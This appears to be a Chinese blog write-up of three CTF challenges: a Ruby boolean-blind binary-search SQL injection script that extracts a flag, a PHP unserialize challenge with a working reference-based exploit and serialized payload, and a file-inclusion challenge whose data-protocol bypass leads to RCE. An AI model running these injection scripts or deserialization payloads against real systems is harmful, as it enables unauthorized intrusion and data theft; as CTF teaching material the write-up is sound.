Author:颖奇L’Amore
Blog:www.gem-love.com
easiestSQLi
布尔盲注+二分注入
#!/usr/bin/ruby -w
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore
require "open-uri"
# Characters recovered so far, one appended per outer iteration.
result = ''
# One iteration per character position. There is no stop condition for the
# end of the value, so the loop keeps issuing requests for up to 1000 positions.
1000.times do |i|
  # Binary search over the printable ASCII range for the byte at position i+1.
  low = 32
  high = 128
  mid = ( low + high ) / 2
  while low < high
    # One HTTP GET per probe; the injected expression compares
    # ascii(substr(...)) with the current midpoint.
    # NOTE(review): from the server side every probe carries `ascii(substr(`
    # in the query string and one character costs several requests in a row,
    # so both a signature-based WAF rule and a per-client rate threshold
    # would see this.
    url = "http://[your_docker_container].cloudeci1.ichunqiu.com/?id=1=((ascii(substr((select(flag)from(flag)),#{i+1},1)))>#{mid})"
    res = nil
    # Kernel#open on a URL relies on the open-uri override (Ruby < 3.0);
    # Ruby 3.x needs URI.open for the same effect.
    open(url) do |http|
      res = http.read
    end
    # String#[] yields nil when the substring is absent; the script treats
    # the absence of 'AGAIN' as "the comparison held" and raises the lower bound.
    if res['AGAIN'] === nil
      low = mid + 1
    else
      high = mid
    end
    mid = ( low + high ) / 2
    # Gives up on this position once the midpoint hits either range boundary.
    if mid == 32 or mid == 127
      break
    end
  end
  result += mid.chr
  puts result
end
Inclusion
读源码找类和反序列化位点
<?php
class Seri{
    // Holds whatever object the (de)serialized payload places here; nothing
    // verifies that it is actually a Flag before __destruct() calls into it.
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    // Runs automatically when the object is released - including for objects
    // produced by unserialize(), which makes this the entry point of the chain.
    // NOTE(review): a type guard such as `if ($this->alize instanceof Flag)`
    // before the call would limit which classes are reachable from here.
    public function __destruct(){
        $this->alize->getFlag();
    }
}
class Flag{
    // Path later handed to highlight_file(); not restricted to any directory.
    public $f;
    public $t1;
    public $t2;
    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        // Both tokens start from the same random md5. unserialize() does NOT run
        // __construct(), so for a deserialized object f, t1 and t2 all come
        // straight from the payload.
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }
    public function getFlag(){
        // t2 is re-rolled from rand(1,10000) and compared with t1 below, so an
        // object built by __construct() passes this check with probability 1/10000.
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            // NOTE(review): $f is client-controlled through the serialized object;
            // the @ suppresses the warning a failed read would otherwise emit.
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        } else {
            echo "no";
        }
    }
}
// NOTE(review): unserialize() on a raw GET parameter lets the client choose the
// class and every property of the resulting object graph, and the __destruct()
// above then runs on it. A data-only format (json_decode) or at least
// unserialize($p, ['allowed_classes' => false]) would close this off.
// Reading $_GET['p'] before the isset() also raises a notice when it is absent.
$p = $_GET['p'];
if (isset($p)) {
    $p = unserialize($p);
} else {
    echo "NONONO";
}
?>
1/10000的成功率,发10000个包爆破有很大概率能够得到flag
利用PHP引用即可,exp:
<?php
class Seri{
    public $alize;
    // Mirrors the target's class layout so serialize() emits the same
    // class and property names.
    function __construct()
    {
        $this->alize = new Flag;
    }
}
class Flag{
    public $f;
    public $t1;
    public $t2;
    function __construct(){
        $this->t2 = md5(rand(1,10000));
        // t1 is a reference to t2, not a copy; serialize() encodes that as
        // R:n (see the output below), so the two properties remain one
        // value after unserialize().
        $this->t1 = &$this->t2;
        $this->f = 'flag.php';
    }
}
$seri = new Seri();
echo serialize($seri);
// Example output (the md5 value differs per run; R:4 is the back-reference for t1):
//O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"1a336426e09602a4f0118326dd6c72ac";s:2:"t2";R:4;}}
Soitgoes
可以用php wrapper,但是过滤了base、rot、string等关键字。利用平时不常见的过滤器读flag.php源码即可

文件包含绕过
vim临时文件得到源码
<?php
header("Content-type: text/html; charset=utf-8");
echo "该死,我的电脑总断电,还好编辑器能帮我恢复,吓死惹";
// Only the php:// wrapper is unregistered; the other built-in stream wrappers
// are untouched and stay usable by the include() further down.
stream_wrapper_unregister('php');
// Per-request scratch directory name; removed again at the end of the script.
$seperate = bin2hex(rand(1,1000000));
// escapeshellarg() quotes the single shell argument; both callers below pass
// a directory name, not a command.
$mkdir = function($dir) {
    system('mkdir -p '.escapeshellarg($dir));
};
$mkdir('users/'.$seperate);
chdir('users/'.$seperate);
// Returns the first entry of the client's address as seen by this request.
// NOTE(review): the two header-based sources are supplied by the client, so
// the returned string is untrusted; the caller turns it into a directory name.
function getIp(){
    // Sources in priority order; the first one present wins.
    $header_keys = array('HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP');
    $raw = null;
    foreach ($header_keys as $key) {
        if (isset($_SERVER[$key])) {
            $raw = $_SERVER[$key];
            break;
        }
    }
    if ($raw === null) {
        $raw = $_SERVER['REMOTE_ADDR'];
    }
    // Only the part before the first comma is kept.
    list($first) = explode(',', $raw);
    return $first;
}
// The client-influenced value from getIp() becomes a directory name: '.' and
// '-' are stripped and basename() drops any path component, but nothing else
// about the string is validated.
$curf = getIp();
$curf = basename(str_replace('.','',$curf));
$curf = basename(str_replace('-','',$curf));
$mkdir($curf);
chdir($curf);
// Writes the full request environment (every header) into the scratch dir.
file_put_contents('res',print_r($_SERVER,true));
chdir('..');
// Only '.' is removed from the requested page; the remainder is still a
// free-form path or stream URL for the include() below.
$_GET['page']=str_replace('.','',$_GET['page']);
// NOTE(review): the content is fetched three separate times (two
// file_get_contents() calls, then include()), so the bytes that were checked
// are not necessarily the bytes that get included. Independently, stripos()
// returns 0 for a match at offset 0, which this truthiness test reads as
// "not found"; the comparison should be `!== false`.
if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
    include($_GET['page']);
}
chdir(__DIR__);
// Cleanup of the per-request directory; $seperate is server-generated hex.
system('rm -rf users/'.$seperate);
?>
利用file_get_contents()和include()对data协议处理的差异,即可绕过waf、包含并RCE

颖奇L'Amore原创文章,转载请注明作者和文章链接
本文链接地址:https://blog.gem-love.com/ctf/2549.html